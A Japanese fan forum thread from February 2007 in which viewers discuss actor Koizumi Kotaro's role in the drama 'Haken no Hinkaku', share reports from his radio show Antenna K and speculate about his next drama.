ずっと好感持ってました。
共演楽しみにしています。いいドラマになるといいですね。

80 :通行人さん@無名タレント:2007/02/07(水) 17:21:47 ID:YZgeIkKf0
>>78
憶えてる、いい話だったよね。
最初は局側の打診に何聞いても良いよって言ってたけど、
後から、あっ離婚のことには触れないで欲しい、子供達がまだ多感な年齢だから・・・
って感じだったと記憶してる。
以前、孝太郎ラボで遠縁の石原良純さんがゲストの時、良純さんは父の都知事に
反発しまくっていた子供時代の話をしていたら、孝太郎はあっけらかんと
「僕、反抗期って一度もなかったんですよ、父から叱られると確かに自分が
間違っていると納得しちゃって・・・」って、ホントに良い親子だなって思った。
小泉さんが国会で子育てについて聞かれて、「しっかり抱いて、そっと降ろして、歩かせる」
って言っていたけど、いろんなエピソードを聞くと納得できる深い言葉だなって思う。
実況では、わかんねーよw とかであふれていたけど。

81 :通行人さん@無名タレント:2007/02/07(水) 17:30:50 ID:WLOM5gg50
][

82 :名無しさん@お腹いっぱい。 :2007/02/07(水) 20:32:31 ID:smlb+WvQ0
小泉父が昔なんかの雑誌のインタビューに答えてたので
「子供を持って無償の愛を知った」
って言ってた。
読んだ当時は自分が子供みたいなもんだからわからんかったが
ああ言う風に育った孝太郎を観るとちゃんと親の愛情を受けて育ったんだなって納得した。

83 :通行人さん@無名タレント:2007/02/07(水) 20:51:01 ID:b4DSqaB3O
>>77
台所、キレイだったよね?いくら料理しなくても磨かないとキレイにならないと思うんだけど。
ちょっと女性の手が入ってる?と感じてしまった自分がいましたよw
レモン表紙も買いましたwやっぱり孝太郎の笑顔には癒されます。
でもずっと若い若いと思っていたけどちょっと大人っぽくなった気がするな〜

84 :通行人さん@無名タレント:2007/02/08(木) 00:00:30 ID:l9L8gUgZ0
>>83
あれは私も「掃除してくれる人(女性)がいるのかしら?w」と思ったよw
孝太郎って笑うと目尻にシワが出来るけどそこも好き。屈託なく笑っている感じがして。
でも確かにちょっと大人っぽくなった気がするね。

個人的には「ハケン〜」は今日みたいに恋愛がメインにならない話の方が好きだなぁ。
前半の大前春子は「ちょっと・・」と思いながら観ていたのだけど後半は面白かった。

今日あたり、来クールのドラマの発表あると思っていたのにまだなのね・・待ち遠しいですw

85 :通行人さん@無名タレント:2007/02/08(木) 00:54:36 ID:356osOWL0
ハケンスレでもいわれてたけど
エレベーターで春子さんを小笠原さんと男二人して放置というのはおかしい。
「小笠原さん、すいませんがこれ届けて下さい」
「大前さん、大丈夫ですか?」
今まで描かれていた里中主任ならこうなったんじゃないのかなあ。
毎回思うんだけど里中主任のキャラが何か足りないのよね。
肝心な場面がないから?いつも胸キュンと感動する台詞は大前さんと東海林さん。
二人で持ってると豪語されても納得というくらい。
里中主任目覚めて!3話の涙ながらの訴えは良かった。

86 :通行人さん@無名タレント:2007/02/08(木) 01:13:16 ID:U5HtkxHC0
>>85
私も今までの里中主任だったらありえないな〜って、違和感ありありだった。
1〜3話と演出が替わってるのでそのせいかも

サブタイトル
1/10 第1話 「スーパー派遣登場!」 南雲聖一 18.2%
1/17 第2話 「プライドとホッチキス」 南雲聖一 18.6%
1/24 第3話 「社員の友情 ハケンの仁義」 南雲聖一 18.8%
1/31 第4話 「恋とお時給」 佐藤東弥 20.1%
2/7 第5話 「お時給インベーター VS ナマコ大先輩」 茂山佳則

87 :通行人さん@無名タレント:2007/02/08(木) 01:41:26 ID:356osOWL0
>>86
なるほどねえ・・・
でも人物設定は一貫してなきゃおかしいよね。

ハケンスレでは孝太郎批判が急に多くなってるしナンカ悔しい!
ずっとハケンスレロムってきたけどこれだけ批判的な意見が続くのは初めてなんじゃ。


88 :通行人さん@無名タレント:2007/02/08(木) 02:37:23 ID:U5HtkxHC0
>>87
批判なんて (・ε・)キニシナイ!!
むしろ批判にしろ叱咤激励にしろ、話題に上がることの方が私はうれしいな。
今までのドラマと比べたらバランスよくいろんな人の話題が上がる、
それだけみんな配役が嵌ってるって事だと思うし。
見直したって言ってくれる人も、応援してくれる人もいるしね。

89 :通行人さん@無名タレント:2007/02/08(木) 10:38:37 ID:lFYurDaG0
小松政男も味を出してたし、やっぱりうまい。
孝太郎はそういう部分は一段落ちる

90 :通行人さん@無名タレント:2007/02/08(木) 21:47:30 ID:/5ALBFkRO
確かに昨日の里中くんは違和感アリアリ。何であんな設定(演出)になったんだろ?
孝太郎はまだまだ役者として発展途上。まだまだなところもあるけど温かく見守りたいなと。
他スレに間違えて書き込んじゃったけど84さんと同じでドラマのストーリーとしては昨日みたいなのが好き。
恋愛の行方にはあまり興味ないので今後も恋愛中心にならない方が嬉しい。

91 :通行人さん@無名タレント:2007/02/08(木) 23:04:09 ID:l9L8gUgZ0
昨日の賢ちゃんの行動は違和感たっぷりという感じだったねぇ。今までの賢ちゃんらしくなかった。
何であんな風に大前さんをほおって行ってしまうようなシチュエーションにしたのか疑問。
大前さんと東海林さんの引き立て役を強調するためにしか思えないと言ったら僻みっぽいのかしらw
「ハケン〜」の出演者は芸達者の役者さんが多いからその中では賢ちゃんという役柄も孝太郎自身もキャラが
弱く感じてしまうかもしれないけど孝太郎だからこそ賢ちゃんの良さをうまく表現していると思うんだけどな。
後半に向けて賢ちゃんも大化けするかもしれないし・・賢ちゃんと大前さんとの恋愛という意味では
そんなに興味はないのだけど、今後の賢ちゃんには大いに期待してますw

92 :通行人さん@無名タレント:2007/02/08(木) 23:09:48 ID:uaj28bfX0
いや、一応仕事しに行ってるんだし、大前さんのケツばかり
追いかけてるわけじゃないでしょ。
あのときは書類のほうが大事。
小笠原を守れなかった自分を悔いてたし・・・
恋愛に興味ないと言いながら、そこしか見てないじゃない。

93 :通行人さん@無名タレント:2007/02/08(木) 23:20:47 ID:l9L8gUgZ0
>>92
感じ悪いね。別にそこしか観ていないつもりないけど。

94 :通行人さん@無名タレント:2007/02/08(木) 23:25:36 ID:BwLLOF150
すごい自演だな、、同じことあちこちに書くなよ。


95 :通行人さん@無名タレント:2007/02/08(木) 23:30:16 ID:/5ALBFkRO
>>93
同意。
ここは過疎ってたけど変に他人のレスにケチつけたりする事がないのが好きだったのに。

96 :通行人さん@無名タレント:2007/02/09(金) 00:47:05 ID:OWyPuW/t0
他スレも最近とげとげしい時があるね。
ゆっくりゆっくりやっていきましょう。

97 :通行人さん@無名タレント:2007/02/09(金) 03:43:40 ID:s5YIII6h0
例え過疎っていたとしてもマッタリとしたこのスレの雰囲気が好きだし
せっかく「孝太郎が好きで応援したい」というファンが集うスレ、楽しく語りたい。
という事で気を取り直しますw

98 :通行人さん@無名タレント:2007/02/09(金) 10:17:42 ID:sANl/cIJ0
大前と東海林のラブロマンスみたいな設定に持っていきたかったから、無理やり
エレベーターに大前を置いてけぼりにしてしまったんじゃないかな?人物設定を
きちんとしておくのは脚本家としては基本中の基本だけど、元々「ハケンの品格」
という作品は娯楽性を重視してるからそんな細かいところまで気が回らなかった
んだろう。
少々雑でも楽しめればOK。でも、孝太郎が女性を置いてけぼりにしても仕事を
優先させるような人に思われそうで、ちょっと嫌だな。

99 :通行人さん@無名タレント:2007/02/09(金) 18:26:59 ID:OWyPuW/t0
>>97
取り直してくれて良かった。
これからも語り合っていきましょう!

100 :通行人さん@無名タレント:2007/02/09(金) 19:25:35 ID:XRB0Ub7z0
79は間違いなく層化婦人だねw

101 :通行人さん@無名タレント:2007/02/09(金) 19:53:26 ID:Lb9Ls9Mq0
>>63
亀でごめんなさいなのですが次のドラマの情報ありがとうございました。
まだ噂の段階のようなので正式な情報が気になります。
また違う孝太郎くんが見られると思うと楽しみです!
ハケンの品格は半分が終わったくらいでしょうか?
里中主任にもまだまだ頑張ってもらわないとw

102 :通行人さん@無名タレント:2007/02/09(金) 22:00:15 ID:lstjmfBjO
私も取り直そっ。たまにわく変なのはスルーしてこれからも楽しくマターリ語りましょ。
ドラマは正式発表なかなか来ないみたいだね。来週くらいなのかな?
次クールのドラマ出演ありそうだと知ってから1週間…長いですw
実はエレベータのシーンは98さんと同じような事考えてた。
でもリアルの孝太郎はフェミニストのイメージあるからおいてきぼりはしないでしょw

103 :通行人さん@無名タレント:2007/02/09(金) 22:45:29 ID:OWyPuW/t0
ドラマ関係者はBBSとか2ちゃんとかみるのかなあ。
孝太郎のデビュードラマで痛い目に合って以来BBSにはトラウマがw
ファンクラブとか組織的な応援部隊を持ってる俳優さんたちのファンは
徒党を組んで書き込むでしょ。一種の世論誘導みたいなw
みんな純粋にその俳優さんを応援してるんだろうし自由なんだからいいんだけど
なんというか、どうやったってそういうパワーにはかなわないw
でも最近は里中孝太郎へのメッセージも増えてきて嬉しい。
まだ投稿していないのでそろそろしようかなと。本人も自分へのメッセージは嬉しいよね。

新ドラマ早く確定してほしい。気になって気になって。

104 :通行人さん@無名タレント:2007/02/09(金) 23:05:34 ID:s5YIII6h0
ドラマ関係者・・少なくても孝太郎はPC持ってないから2chは見ないのかな?
ドラマのBBSの方は控え室で共演者の方と覗いたりしないのかしら・・ねっ?w
実はドラマのBBSはまだ書き込みってした事なくて。。「波の塔」の時は投稿しようと
思ったのだけどいろいろ考えすぎてしまって結局時期を逸してしまってちょっと後悔。

次のドラマ、気になりますね〜 毎日帰宅すると「確定したのかな?」と検索してみるけどまだみたい。
噂になっている「ハチクロ」はストーリーはあまり詳しく知らないのだけど孝太郎が演じるのが
美大生だとしたら学生の孝太郎って意外と新鮮かな?と確定も出ていないのに勝手に妄想してるw
いろんな役を演じる孝太郎を観たいのでリーマンの次に学生も良いかな?ってねw

105 :通行人さん@無名タレント:2007/02/10(土) 00:54:39 ID:RNrkud7A0
アンテナK、最後の方しか聞けなかった・・・(´・ω・`)

106 :通行人さん@無名タレント:2007/02/10(土) 01:24:26 ID:UcBT86fD0
>>105
私もちょとしか聴けなかったんだけど、聴いた時は髪の毛の話をしてた。
夜中まで撮影が続いて次が朝早かったりすると、もう崩したくないから
そのまま現場に行くんだって。そしたらメイクさんに
「洗ってないんですかぁ、もうそんな俳優さんいませんよぉ、ちゃんと洗って下さい」と
言われるって。孝太郎ちゃんと洗って下さいw

107 :通行人さん@無名タレント:2007/02/10(土) 01:59:43 ID:RNrkud7A0
>>106
ありがとう!
The孝太郎と同じ話だね、最後のバイバイの前に今日はバレンタインの
話をしたって言ってたので、何を話したのかな〜って気になった。
バレンタイン欲しいよ〜って叫んでたけど、チョコだろ普通!って
思わず突っ込んでしまったよ。

108 :通行人さん@無名タレント:2007/02/10(土) 08:12:00 ID:h8l7OEqc0
>>103
104にちょっと追加で・・孝太郎はPC持ってないけど「ハケン〜」のスタッフの方が
各出演者へのメッセージをそれぞれに配布したりするかもしれないですよね?
もちろん自分へのメッセージは嬉しいと思うし励みになると思います。
私も今回は1度くらい頑張って書き込みしてみようかな〜

>>106
ラジオの話、ありがとうございます! 昨日、「金曜日だな〜」と思っていたんですよね。
聴けない身なのでどんな話でも孝太郎の様子が想像出来るようでいつもどなたかが話を
して下さるのを嬉しく思っています。 それにしても孝太郎はメイクさん泣かせなんですねw
バレンタインは・・誰に向かって欲しいと叫んだのかしら?ww ファンに・・かな??w

109 :通行人さん@無名タレント:2007/02/10(土) 17:13:05 ID:JEqd5qzj0
組織的なファンクラブって怖いよね。私も組織的なファンクラブで痛い目にあった
から、わかるよ。

110 :通行人さん@無名タレント:2007/02/10(土) 23:27:57 ID:N0x32CXvO
ハケンは第1話から録画して消さずに残しているお気に入りの作品だけど(孝太郎出演も大きな理由)
ドラマ板も公式もたまにロムるくらいであまり覗いてない。でもたまに覗くとすごいパワーだなって思うw
公式のBBSを孝太郎が直接見る事はなくても耳に入る可能性は十分にあるし応援メッセは励みになるだろうね。
>>106
ラジオでの話ありがと!聴けないのでとても嬉しい!先日の美佐子姉さんの時にも話してましたね。
107さんの「バレンタイン欲しいよ〜」を読んだ時最初意味がわからず「そんなに毎日チョコが欲しいの?」と
おかしな解釈をしてしまったバカな自分w

111 :通行人さん@無名タレント:2007/02/11(日) 00:05:30 ID:CexJXpAH0
孝太郎のファンはパワフルというよりはどちらかというとのんびりとしているのかも?
孝太郎の雰囲気もギラギラしているというよりおっとりした印象があるからそれも影響してるのかな?
おかげで自分も安心してというかゆったりとした気持ちで応援出来るというところもあるかも?
周りがあまりにパワフルだとついて行けないかもしれないけど、のんびりマッタリ出来るのでw

112 :通行人さん@無名タレント:2007/02/11(日) 09:46:57 ID:M3wGn1Zh0
アンテナk追加
 友達から「オーラの泉」出ないのとよくいわれる。
 話があれば一度出てみたい。以前、江原さんと番組で一緒になった時
 収録後に「孝太郎さんのお爺様、骨董品を集めるのがお好きだったでしょ。
 寂しがっているのでたまには見てあげて下さい」と言われ、その日実家に
 帰ってみたら、仏壇の横に家族も忘れてしまっていたような引き出し?があり
 そこにお爺ちゃんが集めていたものがいっぱいあった。鳥肌が立った。
  
 恋愛は大切。恋をすると自分の性格が本当に見えてくる。
 その人と出会うことで自分はこんなとこが駄目だったなとか直さなきゃとか。
 出会わなければ気付かなかったこととか大切なことが見えてくる。
 学生なら勉強、社会人なら仕事それぞれ大事だけど、それを除けば
 最重要課題は恋愛じゃないかと。人を好きになるって大事ですよ・・・ 
 ・・・・バレンタインほしいなあ・・・いいんですか?最後こんなしめでw
 せっかくカッコイイこといってたのに結局バレンタインほしいってw
 でも貰えると嬉しいんだよねえ。

最後真面目に恋愛を語っていたのに結局答えは「バレンタインほしい」
グダグダでおかしかったですw
想像ですが新しい彼女ができて初めてのバレンタインなのではないかと。
そういうとこはダメだよと指摘してくれる彼女・・・誰?w

113 :通行人さん@無名タレント:2007/02/11(日) 17:13:55 ID:de3vGCVG0
私も孝太郎のファンはマータリしてるから好きだよ。他のタレントの追っかけして
いる友達なんかは、いろいろと苦労しているみたいだしね。


114 :通行人さん@無名タレント:2007/02/11(日) 19:23:39 ID:9wRy/fG30
私は毎日ネットができないので時々しかここに来られないのですが
そんな私でものんびりとみなさんと話ができるのが楽しいです。
ラジオの話とか次のドラマの話など聞かせてもらえて嬉しいです。
孝太郎くんならバレンタインにたくさんチョコをもらえそうだけど
最後に叫んだのは彼女へのアピールなんでしょうかw


115 :通行人さん@無名タレント:2007/02/11(日) 21:33:14 ID:r/fxlGAA0
芸能人の秘蔵映像発見!!キタ━━━━━━(゚∀゚)━━━━━━!!!
↓↓↓みんなのお宝映像も投稿できるよ!
http://music6.2ch.net/test/read.cgi/musicnews/1117556771/101

116 :通行人さん@無名タレント:2007/02/11(日) 22:10:00 ID:CexJXpAH0
>>112
Antenna Kの追加レポをありがとうございます! レポしていただけるのはとても嬉しいです。
孝太郎のご実家にはやっぱり骨董品がたくさんあったんですねぇ。
でも100円の目利きには役に立たなかったのねw
孝太郎は自分で恋愛体質だとか恋愛経験も少ないと語っていたと聞いたような?
「The孝太郎」でいしだあゆみさんがゲストの時に「恋愛ももういいやと思っても
やっぱりしますもんね」と語っていた。その時に「今、恋愛中なんだな〜」と思いましたw
田中美佐子さんの時には「このまま付き合っていれば結婚するんだろうな」みたいな発言を。
それなりの期間付き合っている彼女なのか新しい彼女なのかなかなか読めないよ、孝太郎ww

>>114
応援のスタイルやペースは人それぞれですよねw 来れる時に楽しく語りましょう!
私も他の方に出演情報をいただいたりラジオのレポをしていただいたりして助かってます。

117 :通行人さん@無名タレント:2007/02/11(日) 22:27:51 ID:TOMv1QP70
コタローいいね
男から見ても好感持てる

118 :通行人さん@無名タレント:2007/02/11(日) 22:34:20 ID:naasfXBxO
いしだあゆみさんがゲストの時は2回とも見逃してしまったのだけどそんな話をしてたんだ?
それは…美佐子姉さんゲストの時の発言と合わせて考えると間違えなく恋愛中ですねw
最後に叫んだのはファンへのアピールという事にしておきましょう…一応w
私もマターリとした雰囲気のこのスレや孝太郎ファンのペースが自分に合うみたい。
>>112
ラジオの話、追加ありがと!

119 :通行人さん@無名タレント:2007/02/12(月) 10:44:16 ID:0w/fZ/wS0
恋愛話を隠さずに話すところなんか好感が持てるな。気取った人や、やたら人気を
気にするような人だったら、恋愛話を異常にさけるじゃない。何故、そこまで隠す
のか〜!みたいな。自分のことをいろいろ話してくれる人って、すてきだね。


120 :通行人さん@無名タレント:2007/02/12(月) 14:28:25 ID:CmLKo0AJ0
>>119
率直ですよね。ラジオが始まった頃、特にファンだったわけでもなく
何気なく聴いたいたら恋愛に心と体どっちが大事?という質問に「両方」と
答えたのを聴いてファンになったw小泉孝太郎は「心」でしょイメージとして。

121 :通行人さん@無名タレント:2007/02/12(月) 20:01:36 ID:BnnRJCEXO
心と体の両方大事だと言ったという話は以前ラジオレポしてくれた方から聞いたように思います。
ラジオではぶっちゃけトークもかなり炸裂するみたいで話を聞くのが楽しい。
いろんな意味で孝太郎のイメージは変わるけどwでもそれがまた魅力だったりするんだよね。

122 :通行人さん@無名タレント:2007/02/12(月) 22:27:01 ID:eWoGwIqu0
孝太郎は内面からにじみ出る清潔感とか高貴な感じの気品とか見ていると心地良いとか
いろんな魅力があると思うんだけど、一方で良い意味で普通にくだけているというか・・
そんな魅力もあるように思う。すごく自然体な人なのではないかなと。

祝日でお休みだったのでつい忘れてしまいそうになりましたが、今日は月曜日。
「The孝太郎」の放送日(正式には日付は明日の火曜日だけど)なんですね〜
ゲストは中嶋朋子さん。トーク盛り上がって意外な一面を知る事が出来たら楽しいw

123 :通行人さん@無名タレント:2007/02/12(月) 22:51:10 ID:BnnRJCEXO
>>122
うわっ、まさに忘れてた。おかげで録画忘れを免れましたw サンクス!
孝太郎の魅力…ハゲドでございますw

124 :通行人さん@無名タレント:2007/02/13(火) 06:58:40 ID:KBEI4tqH0
トーク盛り上がっていましたね。

やっぱり、小さい頃は、パパが忙しかったのか、絵本を読んでいなかったのかな。

中嶋さんの趣味に興味津々で、孝太郎くんが楽屋で、絵本見ていたら、

確かにちょっとびっくりしますね。

125 :通行人さん@無名タレント:2007/02/13(火) 10:32:58 ID:YjpW29iT0
>>124
絵本は子供のときから読んでいないといってたのは
言葉足らずで「子供の時以来」ということだと思う。
絵本の匂いをあんなふうに懐かしむところをみると。
デビュー当時にみた小さい頃の写真にディズニー集やら
絵本がいっぱい写ってた。4歳くらいまではお母さんがいたからその思い出もあるかと。

126 :通行人さん@無名タレント:2007/02/13(火) 12:00:32 ID:MkmgosGo0
プラスって東海地方じゃやってないのかな・・・?

127 :通行人さん@無名タレント:2007/02/13(火) 17:20:54 ID:xwz/g3BF0
孝太郎が司会の番組映らないので残念。

128 :通行人さん@無名タレント:2007/02/13(火) 20:52:03 ID:gmWMkld+O
せっかく孝太郎がホスト役を務める番組を見られないのは寂しいよね。放送される地域が広がると良いけど。
最初はVを見てトークをしてという内容に違和感があったけどゲストの意外な一面がわかって楽しい事も多い。
昨日の中嶋さんもちょっと変わった趣味をお持ちで孝太郎も興味持ってたね。
中嶋さんの「孝太郎さん変わってる〜」に笑ったw実際に会って孝太郎のイメージが変わる人も多いんだろうな。

129 :通行人さん@無名タレント:2007/02/13(火) 23:15:20 ID:dh8+vuN80
トークが盛り上がってゲストの方の意外な一面や素顔がわかるとゲストの方にも好感を抱くかな。
昨日の中嶋朋子さん、アクティブな趣味が多い田中美佐子さんとは対照的にインドア系の
趣味の話をされていたけど個人的に興味深かったし孝太郎も興味津々な様子でしたね。
もっとおとなしくて話さない方かと勝手にイメージしていたけどいろいろ話をするし。
絵本の話は私も最初は「子供の頃から読んでいない」と解釈していたのだけど「子供の時以来」と
いう意味なのでしょうね。「飛び出す絵本が大好きだった」と言っていたし。
きっとゲストの方も実際に孝太郎に会うと会う前よりも意外とくだけた性格なのだとわかって
良い意味で印象が変わって好感を持つ事が多いのではないかしらね?w

130 :通行人さん@無名タレント:2007/02/14(水) 00:02:55 ID:xLdyjjjt0
ハケンがあるのに火9が気になって仕方ない。
「花嫁のパパ」・・・知らないし。

131 :通行人さん@無名タレント:2007/02/14(水) 00:30:39 ID:4xFqQR8x0
確かに火9の内容は気になる。キャストの情報(噂)が流れてからけっこう経つのにね。
毎日帰宅して検索してみるけど正式発表まだみたいだし。
でもドラマ予想板でタイトル落ちたのかな?正式発表が待ち遠しい!


132 :通行人さん@無名タレント:2007/02/14(水) 17:05:30 ID:UEIi/0tJ0
今はハケンを楽しんでいる。ただ、周りで見ている人がいないので、インターネット
でしか盛り上がれないのが残念。1話完結でおもしろいのにな!

133 :通行人さん@無名タレント:2007/02/14(水) 21:56:30 ID:uqRRv86+O
ハケンは面白い作品だよね。最終回まで楽しんで見られそうかな。
次の展開にハラハラドキドキというよりも気楽な気持ちで見られるし。
噂になってる火9ドラマ気になるよ〜出演の噂があるのに正式な発表はなかなかないし。
待たされ感が余計に気になって気になってwでもとりあえずこの後の時間はハケンに集中w

134 :通行人さん@無名タレント:2007/02/14(水) 23:42:01 ID:xLdyjjjt0
加藤あいになりたい

135 :通行人さん@無名タレント:2007/02/14(水) 23:48:30 ID:4xFqQR8x0
そうなんだよね。出るという噂を聞いていなければ逆にここまで気にならないかもしれないけど
正式発表を待たされている分、すごく気になってしまう。 賢ちゃんはお気に入りのキャラだけど
次のドラマは次のドラマでまた全く違ったキャラを演じて違う一面を見せてくれたら嬉しいな。

今までも「ハケン〜」は楽しく観ていたのだけど実際に声を出して笑ってしまったのは今日が初めて。
最初の方で地震の後に賢ちゃんの携帯が鳴って嬉しそうに話をする相手が東海林さんというのも個人的にww
今週の賢ちゃんは先週の違和感が消えていて良かったな。やっぱり演出家の影響って大きい?
大前春子は相変わらずキツイ事言ってるけど最後に涙を流すところはちょっとほろっと来てしまった自分。

136 :通行人さん@無名タレント:2007/02/15(木) 00:13:52 ID:YFji13QXO
やっぱり里中くんは皆に気を配ってる、遣ってるのが似合ってるね。
今日は大前さんにかなり厳しい事を言われて可哀想だったけどw
あれは大前さんの照れ隠しなのかな?ちょっとキツスギル感じもするんだけど…
と言いながら最後にメッセージを読んで涙するところはベタだと思いながら私も好き。

137 :通行人さん@無名タレント:2007/02/15(木) 00:18:11 ID:/GBjr+MG0
>>135
今回の演出は1〜3話と同じ人らしいです。
賢ちゃんの良さを引き出してくれてありがとうって感じです。

138 :通行人さん@無名タレント:2007/02/15(木) 00:22:10 ID:9icgChDO0
そう言えばドラマの中だけでなくリアルバレンタインデーだったわけだが先週のラジオの最後で
叫んでいた(らしい)孝太郎はお目当てのチョコはゲット出来たのかな?w
Antenna Kのサイトの予告のところで今年はいくつのチョコをもらえるか?と予想してますね。
Aだったらどうするんだろ?w

139 :通行人さん@無名タレント:2007/02/15(木) 00:30:00 ID:9icgChDO0
連投でごめんなさい!
>>137
そうみたいですね!>演出の方。
2話で大前さんがわざとホチキス勝負に負けたのに気付いたり最後に森ちゃんに
「寒いから〜」と声をかけたり他人を良く見ていて気遣いする賢ちゃんが好きなので。
今週はまたそんな賢ちゃんが観れて幸せでしたw 私も「ありがとう!」という感じw

140 :通行人さん@無名タレント:2007/02/15(木) 11:20:03 ID:PYsAZnG30
昨夜の賢ちゃんは大満足!
視聴率も20.7と東海林さんのキスを超えたねw
やっぱりなんとなく恋愛絡む方がいいのかも。
黒岩さんが東海林さんに思いをぶつけるのかも楽しみ。
あの人絶対好きよね東海林さんのことw

141 :通行人さん@無名タレント:2007/02/15(木) 17:17:26 ID:d7gV05Ww0
かなりベタな終わり方だったけど、やっぱり自分の思ったとおりに終わってくれる
と安心感がある。水戸黄門的なドラマだよね。必ず視聴者の期待を裏切らずに、い
い感じにチャンチャン!と終わってくれる。印籠が出て来る時間が、大前が活躍する
場面、っていう感じ。
何も変わらないまま、最終回ではないような終わり方をしてほしいな。え?こんな
んで終わり〜、みたいな。


142 :通行人さん@無名タレント:2007/02/15(木) 17:49:27 ID:2TsuaXwRO
七光りだけですぐに消えるのかと思ったが、地道に頑張ってるよね。この人は年とっても活躍してそう。

143 :通行人さん@無名タレント:2007/02/15(木) 20:10:09 ID:YFji13QXO
>>138
バレンタイン当日にハートの被り物をしてる孝太郎を見られるとはねw
チョコどうだったんだろうね?ドラマに入ってるからスタッフさんとかからももらっただろうけど。
それにしてもアンテナKの笑える孝太郎の写真、なかなか変わりませんねw
昨日の放送は視聴率20%超えですか!面白かったし里中くんも良かったし個人的には大満足。

144 :通行人さん@無名タレント:2007/02/16(金) 07:41:10 ID:hOmTNR7v0
水戸黄門みたいというのは面白いw でも確かにそんな感じかもw
「ハケン〜」は途中気になるところもあったりもするのだけど全体として
楽しめるので自分としては安心して観ていられるというのはあるかな。
視聴率も安定して高い数字を残しているしファンとしても嬉しい限りですw

145 :通行人さん@無名タレント:2007/02/16(金) 10:10:35 ID:qap945jF0
ハケンは私も途中気になるというより、絶対に有り得な〜い、って思うことが
よくある。普通はいくら資格をたくさん持ってるからといって、助産婦の資格
なんて有り得ないでしょう。助産婦の免許なんて、取るのに何年かかると思っ
てるんだ〜。
ドラマはあくまでも娯楽性最優先だし、かたくないところがこの作品のいいと
ころだから、あまり気にせず見ようかと思ってる。

146 :通行人さん@無名タレント:2007/02/16(金) 12:46:24 ID:Vn5fNWUn0
助産師は1,2年くらい?
その前に看護師の資格が必要だから、
時々ハケンしながら学校に通っても結構大変そう。
まあ、そんなことを色々しながら今の34歳の春子がいるって設定なんだろうけど


147 :通行人さん@無名タレント:2007/02/16(金) 21:50:06 ID:KLDwLukK0
アンテナK
久々に日曜日休みでした
 1ヶ月半振りに休み、滅茶苦茶嬉しかった。
 従兄弟の大学生を誘って、露天風呂に行った。
 男二人で50分露天風呂、従兄弟が「ショーシャンクの空に」を観て
 「孝ちゃん滅茶苦茶良かったよあの映画 」ほとんど映画の話で50分
 家の風呂はあんまり好きじゃないけど、温泉、露天風呂は好き
 50分が苦じゃない、何でなんだろう

【バレンタインの結果報告 】
 里中主任大好きですって言っていただいて、里中主任効果で予想外に頂きました
 「里中主任貰ってください」って頂いたのが結構あった、小泉孝太郎さんではなく・・・
【たばこ 】
 ヘビーじゃないけどずっと吸ってます、イメージじゃないってよく言われます
 年々減ってきている、今は一日10本ちょっとくらい
 無理にじゃないけど、いずれはやめようかなって思ってる
【遅刻した時の言い訳 】
 「ごめん寝坊しちゃった・・・ 」
 仕事の時はマネージャーのアグレッシブな運転のおかげで遅刻はないなぁ
【コラーゲン 】
 僕ねぇ意外とちっちゃい頃から、生意気かもしれないけど、
 豚足とかフカヒレとかコラーゲンが入っているっぽいもの好きなんです
【やってみたい企画 】
 お台場海浜公園とか外でちょっと飲んじゃったりして
 ゲストの方とお酒を飲んで花見をしながら対談とか

148 :通行人さん@無名タレント:2007/02/16(金) 21:52:44 ID:KLDwLukK0
アンテナK
リスナーのメッセージ  テーマ:バイトの品格
・静岡のたこ工場に住み込みのバイト
 高校(大学?)時代ワインの梱包作業のバイトしたときに、休憩時間にケーキを食べようとしたら
 フォークがふるえて食べられなかった、延々と梱包していたから手がふるえちゃって。
・クリスマスケーキの店頭販売、カップルがいちゃいちゃして結局買わなかったり・・・
 23日24日に・・・やだなぁ〜俺、その時に彼女が居なかったりしたら余計に

来週はスガシカオさんがゲスト

まとめるの下手なので、箇条書きのまま
他に聞いていた方がいらしたら、補足、訂正お願いします。

149 :通行人さん@無名タレント:2007/02/16(金) 21:55:47 ID:KLDwLukK0
>>148
たこ工場と、店頭販売はリスナーのバイト体験です。
その下が、それぞれに対して孝太郎のコメントです。
判りにくくすみません。

150 :通行人さん@無名タレント:2007/02/16(金) 23:11:40 ID:hOmTNR7v0
>>145
確かに助産師というのはやりすぎという気がしないでもないね。 ある意味、マンガかな?w
まさか医師免許までは持っていないだろうけど、何でもあり・・みたいな雰囲気はありますねw

>>147-149
ラジオのレポ、ありがとうございます! 
聴けないのでレポして下さる方がいるといつも嬉しく思っています。
一昨日のバレンタインの結果をもう報告? ラジオって録音ではないのかしら?
もっとも当日でなくてもバレンタイン近くからたくさんいただいているのでしょうが。
さすが賢ちゃんは大人気ですね!「里中主任貰って下さい」って笑えるけどわかるw
いえ、私はもちろん賢ちゃんだけじゃなくて孝太郎が好きなんだけどw
外でお酒を飲みながらゲストとお花見対談って良いかも! 話もはずむのではないかなと。
でもラジオは聴けないので・・出来れば「The孝太郎」での放送希望ですw

151 :通行人さん@無名タレント:2007/02/16(金) 23:46:27 ID:Ja98q2vl0
ラジオレポありがとう!!
里中主任人気ですねw
ちっちゃい頃からフカヒレとか大好きな環境でも
大学生でバイトしてる孝太郎、そのアンバランスがいいw

煙草一日10本くらいってあまり多くないよね。
イメージじゃないし思い切ってやめたらいいのに。

152 :通行人さん@無名タレント:2007/02/16(金) 23:49:34 ID:Ms71ZuUQO
>>147
ラジオのレポありがと!聴けない身なのでレポしてくれる方には感謝でいっぱい。
里中主任みたいなステキな独身上司がいたら私もはりきって義理チョコ、いやいや本命を差し上げたいw
孝太郎、ヘビースモーカーではなくても1日10本も吸うのね。多くはないけど。
吸うという話は聞いてたけど気分転換に吸うみたいに聞いたからたまに吸うくらいだと思ってた。
大人だから良いのだけどやめられるなら体のためにも止めて欲しいかな…
お酒が飲めるゲストとのお花見トーク良いですねw

153 :通行人さん@無名タレント:2007/02/17(土) 00:31:16 ID:D0JGBcvw0
>>150
聞いていて、やっぱり孝太郎自身も、「孝太郎プラス」の方が良かったんだろうなって
思ったよ、お酒も結構飲んでたし、いろんな所にいけたし。

>>151,152
どうも周りの雰囲気に流されてしまうらしい、ずっと吸わなくても全然平気なんだけど
誰か吸ってる人がいると、自分もって・・・吸っちゃうって言っていた。
あの世界喫煙率高そうだしね。
孝太郎パパも昔吸ってたけど、ある時お気に入りのライターが壊れたか無くなったかして
ライター無いからもう吸わないって、止めちゃったらしいので
孝太郎もちょっとしたきっかけがあれば、簡単に止められるんじゃないかな。

--ドラマ板から拝借--
496 名前:名無しさんは見た!@放送中は実況板で メェル:sage 投稿日:2007/02/16(金) 23:32:05 ID:0gK7H1210
生で見たキャストの印象。

松方→黙ってるとかなりの貫禄。ちょっと怖い。でも笑うとカワユスw
大泉→足長い!そして、思ったほどクルクルじゃない!w
